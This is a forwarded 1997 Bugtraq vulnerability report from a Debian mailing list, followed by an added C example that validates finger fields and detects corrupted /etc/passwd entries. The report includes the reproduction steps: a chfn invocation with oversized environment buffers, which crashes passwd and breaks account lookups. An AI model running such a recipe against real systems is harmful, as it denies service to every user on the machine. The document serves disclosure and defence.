The debian-private mailing list leak, part 1.


[alex@NET-CONNECT.NET: Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)]



I just received this one. It looks like there is a buffer overrun
in the shadow suite.

I tested this on my hamm system and did not find the error. I did
get a strange error message though:

	$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
	chfn: Permission denied.

I guess there is a length-check somewhere that protects us.
If someone could test a stable/bo system, please do so and report
the results.

Wichert.

-----Forwarded message from Alex Mottram <alex@NET-CONNECT.NET>-----

Date:         Fri, 19 Dec 1997 07:37:49 -0600
Reply-To: Alex Mottram <alex@NET-CONNECT.NET>
From: Alex Mottram <alex@NET-CONNECT.NET>
Subject:      Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)
To: BUGTRAQ@NETSPACE.ORG

I don't have the time to look into this much further, but it definitely
looks scary.  I've tried it on 3 machines, and they all produce the
same results.  For what it's worth, all 3 machines were installed from
the Redhat PowerTools 4.2 CD and have applied all relevant patches
from ftp.redhat.com/pub/updates/4.2/i386/.

Configuration Information
---------------------------------------------
[alex@machine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)

rpm -qf /usr/bin/chfn
util-linux-2.5-38

rpm -qf /usr/bin/passwd
passwd-0.50-7

rpm -q pam
pam-0.57-4

[alex@machine alex]$ cat /etc/pam.conf
#
#  THIS FILE IS NOW OBSOLETE
#
#  The contents of this file should be replaced by files in the
#  /etc/pam.d/ directory.
#
#

[alex@machine alex]$ ls /etc/pam.d/
chfn    ftp     login   passwd  rlogin  samba   xdm
chsh    imap    other   rexec   rsh     su

[alex@machine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so shadow nullok use_authtok
session    required     /lib/security/pam_pwdb.so

[alex@machine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so use_authtok nullok

[alex@machine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash

[alex@machine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as
well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash

[alex@machine /tmp]$ ./pass
[alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.
[alex@machine /tmp]$ wc /etc/passwd
     26      29    2068 /etc/passwd

** At this point, the passwd entry for 'alex' is >48k long **

[alex@machine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault

** LOGIN AS SECOND USER **
[zane@machine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

** 'passwd' just snipped our one big line into nice 8k chunks
** and created some junk passwd file entries.

[zane@machine zane]$ wc /etc/passwd
     31      34   47829 /etc/passwd

[zane@machine zane]$ su someuser
su: user someuser does not exist
[zane@machine zane]$ su alex
su: user alex does not exist
[zane@machine zane]$ su zane
su: user zane does not exist

Other services I checked were equally screwed.  (ftp, pop-3, etc...)

-----End of forwarded message-----
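The report above shows two things going wrong at once: chfn accepts finger fields of unbounded length and writes them straight into the GECOS column, and passwd later reads the resulting multi-kilobyte line back through fixed-size buffers, crashing and then splitting the line into junk entries that break every lookup. The following C code is an added example written for this page, not code from the shadow suite, util-linux or either poster: it shows the length and character check Wichert guessed must exist (the GECOS_MAX and PASSWD_LINE_MAX limits are assumed values chosen for illustration, not the real tools' limits), and a small scanner that flags the kind of malformed /etc/passwd lines the forwarded message describes (wrong number of colon-separated fields or over-long lines). The sample passwd contents are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for this example (hypothetical, not from chfn or passwd). */
#define GECOS_MAX        80                    /* per chfn sub-field */
#define GECOS_TOTAL_MAX  (4 * GECOS_MAX + 4)   /* four fields, three commas, NUL */
#define PASSWD_LINE_MAX  1024                  /* one /etc/passwd entry */

/* Accept one GECOS sub-field only if it is bounded in length and contains
 * no ':' (passwd field separator), ',' (GECOS sub-field separator),
 * newline or other control character. Rejecting these keeps a single
 * chfn call from producing more than one passwd line. */
bool gecos_field_ok(const char *s) {
    if (s == NULL) return false;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (i >= GECOS_MAX) return false;          /* over the length cap */
        unsigned char c = (unsigned char)s[i];
        if (c == ':' || c == ',' || c == '\n' || c < 0x20 || c == 0x7f)
            return false;
    }
    return true;
}

/* Compose "full,room,work,home" the way chfn lays out the GECOS column.
 * Returns the length written, or -1 if a field is invalid or the result
 * would not fit in out (snprintf reports the would-be length). */
int gecos_compose(char *out, size_t outsz, const char *full,
                  const char *room, const char *work, const char *home) {
    if (!gecos_field_ok(full) || !gecos_field_ok(room) ||
        !gecos_field_ok(work) || !gecos_field_ok(home))
        return -1;
    int n = snprintf(out, outsz, "%s,%s,%s,%s", full, room, work, home);
    if (n < 0 || (size_t)n >= outsz) return -1;    /* would truncate */
    return n;
}

/* Convenience wrapper: would this chfn request be accepted? */
bool chfn_request_ok(const char *full, const char *room,
                     const char *work, const char *home) {
    char buf[GECOS_TOTAL_MAX];
    return gecos_compose(buf, sizeof buf, full, room, work, home) >= 0;
}

/* Count malformed entries in a passwd-format buffer: a valid entry has
 * exactly seven colon-separated fields (six colons) and a bounded length.
 * Chunks left over from a split-up oversized line fail one of those tests. */
int count_bad_passwd_lines(const char *buf) {
    int bad = 0;
    const char *line = buf;
    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        int colons = 0;
        for (size_t i = 0; i < len; i++)
            if (line[i] == ':') colons++;
        if (len == 0 || len > PASSWD_LINE_MAX || colons != 6) bad++;
        if (nl == NULL) break;
        line = nl + 1;
    }
    return bad;
}

/* Constructed sample data: a healthy file, and one where an oversized
 * entry for 'alex' was chopped into pieces (as the report describes). */
static const char SAMPLE_PASSWD_OK[] =
    "alex:x:500:500:alex,,,,:/home/alex:/bin/bash\n"
    "zane:x:501:501:zane,,,,:/home/zane:/bin/bash\n";

static const char SAMPLE_PASSWD_CORRUPT[] =
    "alex:x:500:500:XXXXXXXXXXXXXXXX\n"      /* head of the split entry */
    "XXXXXXXXXXXXXXXX\n"                     /* middle chunk, no fields */
    "XXXX:/home/alex:/bin/bash\n"            /* tail of the split entry */
    "zane:x:501:501:zane,,,,:/home/zane:/bin/bash\n";

int main(void) {
    printf("'Alex Mottram' accepted as GECOS field: %d\n",
           gecos_field_ok("Alex Mottram"));
    printf("bad lines in healthy sample:   %d\n",
           count_bad_passwd_lines(SAMPLE_PASSWD_OK));
    printf("bad lines in corrupted sample: %d\n",
           count_bad_passwd_lines(SAMPLE_PASSWD_CORRUPT));
    return 0;
}
```

The scanner is the check a defender could run after any account-database change: a passwd file whose line count or field structure no longer matches expectations is exactly the symptom that made su, ftp and pop-3 stop resolving users in the report.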
